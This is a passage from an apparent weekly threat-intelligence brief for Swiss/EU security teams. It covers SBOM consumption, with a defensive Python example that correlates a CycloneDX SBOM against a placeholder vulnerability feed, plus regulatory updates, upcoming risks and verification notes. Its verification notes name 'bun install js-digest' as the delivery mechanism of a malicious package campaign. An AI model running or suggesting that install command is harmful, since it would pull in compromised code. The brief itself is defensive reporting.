ENISA released its end-2025 SBOM adoption survey on 9 June — the first EU-wide empirical baseline (ENISA). The report confirms the CRA is the primary accelerant of SBOM adoption and that organisations are investing in SBOM generation and SDLC/CI-CD integration. The practical gap this creates — generation capability advancing faster than operational consumption (ingesting a vendor's SBOM into your own vulnerability-management workflow) — is the operational challenge it implies for Swiss/EU procurers; that framing is this brief's inference, not a stated headline of the report. It lands 94 days before the CRA's 11 September reporting-platform milestone. What to do differently: for public-sector procurement, demand SBOM deliverables in tenders now and verify your own consuming capability — generating SBOMs satisfies a producer obligation, but the defensive value (correlating known-bad components against CVE feeds) only materialises if you can ingest supplier SBOMs before the reporting obligation begins. This connects directly to § 6's "technology is the front line" synthesis.
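The consumption step the survey finds lagging, shown as an added example that is not ENISA's code or any real SBOM tool: parse a supplier's CycloneDX JSON SBOM, normalise each component to its package URL, and correlate it against a vulnerability feed expressed as OSV-style introduced/fixed ranges. Both the SBOM and the feed are constructed inline with placeholder identifiers; components without a purl are reported separately, since they are exactly the entries an ingestion pipeline cannot reason about.

```python
"""Consume a CycloneDX SBOM and correlate its components against a vulnerability feed.

Added example (not ENISA's or any SBOM vendor's code). Demonstrates the
'consumption' side: supplier SBOM in, list of affected components out, plus
the components that could not be correlated at all.
"""
from dataclasses import dataclass
from typing import Optional
from urllib.parse import unquote

def parse_purl(purl: str) -> dict:
    """pkg:type/namespace/name@version?qualifiers#subpath -> parts.
    Qualifiers and subpath are dropped; namespace and name are %-decoded."""
    if not purl.startswith("pkg:"):
        raise ValueError(f"not a package URL: {purl!r}")
    body = purl[4:].split("#", 1)[0].split("?", 1)[0]
    version = None
    if "@" in body:
        body, version = body.rsplit("@", 1)
    parts = body.strip("/").split("/")
    namespace = "/".join(parts[1:-1]) or None
    return {"type": parts[0], "namespace": unquote(namespace) if namespace else None,
            "name": unquote(parts[-1]), "version": version}

def vkey(v: str) -> tuple:
    """Dotted numeric ordering; non-numeric segments sort as 0 (demo simplification)."""
    return tuple(int(s) if s.isdigit() else 0 for s in v.split("."))

def in_range(version: str, introduced: str, fixed: Optional[str]) -> bool:
    """OSV-style semantics: affected if introduced <= version < fixed (fixed None = open-ended)."""
    v = vkey(version)
    return v >= vkey(introduced) and (fixed is None or v < vkey(fixed))

@dataclass
class Match:
    vuln_id: str
    purl: str
    fixed: Optional[str]

def correlate(sbom: dict, feed: list) -> dict:
    """Return {'matches': [Match...], 'uncorrelatable': [...]} for a CycloneDX dict."""
    matches, uncorrelatable = [], []
    for comp in sbom.get("components", []):
        purl = comp.get("purl")
        if not purl:
            uncorrelatable.append(f"{comp.get('name')}@{comp.get('version')}")
            continue
        p = parse_purl(purl)
        if p["version"] is None:
            uncorrelatable.append(purl)
            continue
        for entry in feed:
            f = parse_purl(entry["package"])
            if (f["type"], f["namespace"], f["name"]) != (p["type"], p["namespace"], p["name"]):
                continue
            if in_range(p["version"], entry["introduced"], entry["fixed"]):
                matches.append(Match(entry["id"], purl, entry["fixed"]))
    return {"matches": matches, "uncorrelatable": uncorrelatable}

# Constructed supplier SBOM (minimal CycloneDX 1.5 JSON fields), not a real product.
SAMPLE_SBOM = {
    "bomFormat": "CycloneDX",
    "specVersion": "1.5",
    "components": [
        {"type": "library", "name": "left-pad", "version": "1.2.0", "purl": "pkg:npm/left-pad@1.2.0"},
        {"type": "library", "group": "@acme", "name": "helper", "version": "0.3.1",
         "purl": "pkg:npm/%40acme/helper@0.3.1"},
        {"type": "library", "name": "requests", "version": "2.32.0", "purl": "pkg:pypi/requests@2.32.0"},
        {"type": "library", "name": "legacy-lib", "version": "4.0.0"},  # no purl: cannot be correlated
    ],
}

# Constructed feed with placeholder identifiers (VULN-DEMO-*), not real advisories.
FEED = [
    {"id": "VULN-DEMO-0001", "package": "pkg:npm/left-pad", "introduced": "1.0.0", "fixed": "1.3.0"},
    {"id": "VULN-DEMO-0002", "package": "pkg:npm/%40acme/helper", "introduced": "0.0.0", "fixed": "0.3.1"},
    {"id": "VULN-DEMO-0003", "package": "pkg:pypi/requests", "introduced": "2.30.0", "fixed": None},
]

if __name__ == "__main__":
    result = correlate(SAMPLE_SBOM, FEED)
    for m in result["matches"]:
        print(f"{m.vuln_id}: {m.purl} (fixed in {m.fixed or 'no fix yet'})")
    print("not correlatable:", result["uncorrelatable"])
```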

EDPB adopts a harmonised GDPR Article 33 breach-notification template

The European Data Protection Board adopted a common EU/EEA personal-data-breach notification template under GDPR Article 33 at its 10 June plenary, opening it for public consultation until 5 August (EDPB; daily 06-11). What to do differently: breach-response runbooks that currently target per-DPA notification formats should be reviewed against the harmonised template during the consultation window — a single common format reduces the cross-border friction that has historically slowed multi-jurisdiction breach reporting, but only if your incident-response process pre-maps its fields.

CISA replaces the flat KEV 14-day rule with risk-tiered remediation (BOD 26-04)

CISA issued Binding Operational Directive 26-04 on 10 June, superseding BOD 19-02 and BOD 22-01 and replacing the flat 14-day KEV remediation rule with risk-tiered deadlines, including a 3-day class for the worst exposures (CISA; daily 06-12). The deadlines bind only US Federal Civilian Executive Branch agencies and carry no compliance weight in CH/EU. What to do differently — and what not to: the useful signal for a Swiss/EU SOC is the risk-tiering model (exploitation status and exposure driving remediation urgency), not the deadlines themselves; the KEV listing flag remains jurisdiction-agnostic confirmation of in-the-wild exploitation, but a KEV deadline is never the reason an item is urgent for this audience.

9. Looking ahead — what to watch next week

A focused, justified list — items already in motion, not predictions.

  • G7 Évian summit, 15–17 June — pre-stage DDoS mitigations now. NCSC-CH's advisory explicitly names Swiss organisations as the hacktivist-DDoS target pool for the summit window (Évian sits on the Swiss border), consistent with the NoName057(16) pattern around past Swiss-adjacent summits. Confirm upstream scrubbing burst capacity, test CDN/anycast failover, and pre-position out-of-band NOC comms before Monday. MITRE ATT&CK T1498/T1499. (NCSC-CH G7 advisory)
  • GreatXML and RoguePlanet remain unpatched — watch MSRC for an out-of-band response. Two Chaotic Eclipse disclosures (GreatXML BitLocker bypass, RoguePlanet Defender SYSTEM EoP) have public PoCs and no fix after June Patch Tuesday closed three siblings; the researcher's cadence suggests more. Retain BitLocker PIN/TPM policy and monitor MSRC. (SecurityWeek — GreatXML; BleepingComputer — RoguePlanet; daily 06-12)
  • CRA 11 September reporting-platform milestone is now ~90 days out. ENISA's SBOM survey data points to generation outpacing consumption (the brief's inference from the report, not a finding the report states); the window to build SBOM ingestion into your vulnerability-management workflow before the reporting obligation begins is closing. (ENISA SBOM)
  • npm v12 will disable install scripts by default — audit CI/CD before July. GitHub's announced breaking change (preinstall/install/postinstall off by default, npm approve-builds required) is the single most effective structural mitigation against the Shai-Hulud/Atomic Arch install-time-execution kill chain, but it will break pipelines that rely on build scripts. Inventory affected pipelines now. (GitHub changelog; daily 06-12)
  • Acer Wave-7 mesh-router maximum-severity zero-days (CVE-2026-49200/-49201) still await a fix targeted for end-June. Cleartext-credential logging plus a hardcoded backup key, CVSS 10.0, no patch yet — track the firmware release and treat exposed Wave-7 management as compromised in the interim. (BleepingComputer; daily 06-08)
  • EDPB Article 33 harmonised-template consultation closes 5 August. Breach-response process owners with multi-jurisdiction obligations have a window to review and comment. (EDPB)

10. Verification & coverage notes

  • Items flagged [SINGLE-SOURCE] this week: CrowdStrike 2026 Technology Threat Landscape Report (§ 6; vendor telemetry, directionally valid, no independent corroboration); APT28 tradecraft evolution (§ 7; Sekoia TDR sole source, reported as the actor's TTPs and attributed to the reporting, not asserted as new incidents); Check Point IKEv1 CVE-2026-50751 (§ 1; the vendor PSIRT advisory is the canonical primary for the vendor's own product); Splunk CVE-2026-20253 (§ 3; Splunk advisory); SAP NetWeaver CVE-2026-44748 (§ 3; Onapsis analysis of SAP's HotNews note); WinRAR CVE-2025-8088 (§ 3; Trend Micro research). Government, EU-body and national-authority single sources covered by the verification carve-out (the disclosing body is itself the primary): Germany CRA implementation bill (§ 8; Deutscher Bundestag primary), ENISA SBOM Adoption State of Play (§ 8; ENISA primary), EDPB Article 33 template (§ 8; EDPB primary), NCSC-CH G7 Évian advisory (§ 8/§ 9; NCSC-CH primary), MariaDB CVE-2026-49261 (§ 3; NCSC-CH Security Hub primary, corroborated by MariaDB documentation). The § 2 Chaotic Eclipse Patch-Tuesday round-up is sourced to news aggregators (BleepingComputer, SecurityWeek) because patch-day reporting is inherently aggregator-led: reduced confidence on the exact CVE-to-codename mapping, though the patched/unpatched split is corroborated across both. VerdantBamboo (§ 7) is now multi-source (Volexity primary + The Hacker News corroboration). Velvet Ant (§ 7) leads with a verified-live The Hacker News relay because the Sygnia "Operation Highland" page returns automated-UA blocks (Imunify360/Cloudflare); it is likely reachable from a human browser.
  • Items dropped from this week's roll-up: 2026-06-07 overlap-day items belonging to the W23 window (Chrome 149 / CVE-2026-10881, FFmpeg AI-found zero-days / CVE-2026-39210, polyfill[.]io reactivation, Stripe-API Magecart, WeTransfer steganographic loader) — covered in the W23 cycle, no new in-window development; FIFA World Cup 2026 / Ghost Stadium PhaaS (tournament kicked off 11 June, no new primary research and no confirmed infrastructure attack in-window); TA4922 and Gamaredon (no new in-window development beyond W23 coverage — W1); OceanLotus/APT32 FireAnt supply-chain, JDY botnet, The Gentlemen ransomware (fully resolved in dailies, no weekly-qualifying delta); single-day research items not meeting W-PD-1 (Teams external-chat phishing, AI-brand-impersonation malware delivery, cloud-logging defense-evasion, Entra Agent ID OBO abuse, Imperva/Varonis OpenClaw prompt-injection, Agentjacking, Google v. "Outsider" PhaaS) — these were operationally useful in the dailies but are not cross-day patterns or horizon shifts.
  • Contradictions: none unresolved this run.
  • Reduced-confidence items: Atomic Arch AUR compromised-package count (§ 2) — reporting ranges from 900 (PrivacyGuides) to ~1,500 (end-of-day 12 June); W1 assessed this MEDIUM confidence. The delivery-mechanism change (bun install js-digest) is the verified detail; the exact count is approximate.
  • Sub-agents: both W1 (long-horizon) and W2 (policy) returned within budget. W1's findings.W1.yaml ended-timestamp is consistent with its return line; W2's findings.W2.yaml carries an internal ended-timestamp that disagrees with its return-line timestamp, so the authoritative **Timestamps:** return line (started 23:10:31Z, ended 23:20:13Z) was used for the run log.
  • Verification: 2 iterations (iter 1 Claude Opus 4.8 → NEEDS_FIXES, truth=4 all remediated: Splunk RCE-overstatement, stale NIS2 corroborating link, Novo Nordisk data-category over-itemisation, Atomic Arch count/Shai-Hulud attribution; iter 2 Claude Sonnet 4.6 → NEEDS_FIXES, truth=2 both remediated: ENISA SBOM consumption-gap reframed as the brief's inference rather than the report's stated finding, Coupang root cause corrected to key theft by a former employee). Residuals: 2 — published via the low-defect early-exit path (iteration-2 truth+editorial ≤ 2 with no broken-URL/hallucination findings; both residual findings were nonetheless remediated before publish rather than carried).
  • Coverage gaps: databreaches-net (persistent HTTP 403, rotation-priority); sophos-xops (HTTP 503, persistent); inside-it-ch (Cloudflare 403, persistent); finma (no in-window guidance — quiet); ofcom-bakom (no in-window cyber publication — quiet); us-treasury-ofac (no in-window cyber sanctions action — quiet); cnil-fr (no in-window enforcement — quiet); ico-uk (no new in-window action — quiet).